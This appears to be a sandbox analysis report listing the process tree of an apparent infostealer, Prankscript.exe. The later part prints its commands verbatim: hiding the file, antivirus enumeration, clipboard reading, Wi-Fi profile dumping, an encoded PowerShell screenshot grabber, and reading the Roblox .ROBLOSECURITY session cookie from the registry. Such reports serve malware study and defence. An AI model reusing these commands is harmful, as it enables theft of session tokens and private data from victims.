        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5488,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=5492 /prefetch:14
        7⤵
        
        PID:3132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5368,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=5244 /prefetch:1
        7⤵
        
        PID:4584
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5812,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=5844 /prefetch:12
        7⤵
        
        PID:2584
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6072,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:14
        7⤵
        
        PID:4172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6080,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=6024 /prefetch:14
        7⤵
        
        PID:3528
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7028,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=3728 /prefetch:14
        7⤵
        
        PID:3132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
        
        cookie_exporter.exe --cookie-json=1132
        8⤵
        
        PID:4548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7032,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:14
        7⤵
        
        PID:1980
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7032,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:14
        7⤵
        
        PID:2996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3612,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:14
        7⤵
        
        PID:456
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=3624 /prefetch:14
        7⤵
        
        PID:232
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3728,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=7088 /prefetch:14
        7⤵
        
        PID:1860
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6916,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:14
        7⤵
        
        PID:2496
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6968,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=6992 /prefetch:14
        7⤵
        
        PID:5028
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7396,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=7248 /prefetch:14
        7⤵
        
        PID:4016
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7568,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=6976 /prefetch:14
        7⤵
        
        PID:5264
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7400,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=7708 /prefetch:14
        7⤵
        
        PID:5492
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7432,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=7724 /prefetch:14
        7⤵
        Modifies registry class
        
        PID:5472
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7620,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=7900 /prefetch:14
        7⤵
        
        PID:5976
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7528,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=7660 /prefetch:14
        7⤵
        
        PID:5988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7464,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=5696 /prefetch:14
        7⤵
        
        PID:6000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6992,i,825513692626214743,11031812418672074348,262144 --variations-seed-version --mojo-platform-channel-handle=4604 /prefetch:14
        7⤵
        
        PID:5624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1908
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
      4⤵
      Views/modifies file attributes
      PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3084
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4640
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:788
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1476
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2104
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2996
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5020
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y2j33ji4\y2j33ji4.cmdline"
        5⤵
        
        PID:776
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF6E.tmp" "c:\Users\Admin\AppData\Local\Temp\y2j33ji4\CSCC686CA5A75B740C2BB4C42355630BD8.TMP"
        6⤵
        
        PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4044
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3932
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:720
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:788
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1968
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3956
- - C:\Windows\system32\cmd.exe
